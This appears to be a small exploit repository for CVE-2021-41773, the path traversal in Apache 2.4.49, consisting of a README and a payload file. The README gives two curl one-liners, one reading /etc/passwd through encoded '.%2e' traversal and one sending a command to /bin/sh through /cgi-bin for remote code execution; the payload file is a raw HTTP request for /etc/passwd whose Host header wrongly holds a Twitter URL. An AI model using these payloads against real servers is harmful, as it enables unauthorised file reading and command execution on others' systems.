├── README.md
└── payload


/README.md:
--------------------------------------------------------------------------------
 1 | # cve-2021-41773
 2 | CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.
 3 | 
 4 | 
 5 | ### RCE POC
 6 | 
 7 | [PoC](https://twitter.com/RapidSafeguard/status/1445730458487033861)
 8 | 
 9 | ### Payload
10 | ##### curl -s --path-as-is "<IP>:[PORT]/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
11 | ##### curl -s --path-as-is --data "echo;Command" "[IP]:[PORT]/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh
12 | 
13 | 
14 | #### Follow us 
15 | #### [Vulnmachines](https://www.twitter.com/vulnmachines)
16 | #### [YouTube](https://www.youtube.com/c/vulnmachines)
17 | #### [Twitter](https://www.twitter.com/vulnmachines)
18 | #### [Facebook](https://www.facebook.com/vulnmachines)
19 | #### [LinkedIn](https://www.linkedin.com/company/vulnmachines)
20 | 
21 | 
22 | 
23 | 


--------------------------------------------------------------------------------
/payload:
--------------------------------------------------------------------------------
 1 | GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
 2 | Host: https://www.twitter.com/vulnmachines
 3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 5 | Accept-Language: en-US,en;q=0.5
 6 | Accept-Encoding: gzip, deflate
 7 | Connection: close
 8 | Upgrade-Insecure-Requests: 1
 9 | Pragma: no-cache
10 | Cache-Control: no-cache
11 | 
12 | 


--------------------------------------------------------------------------------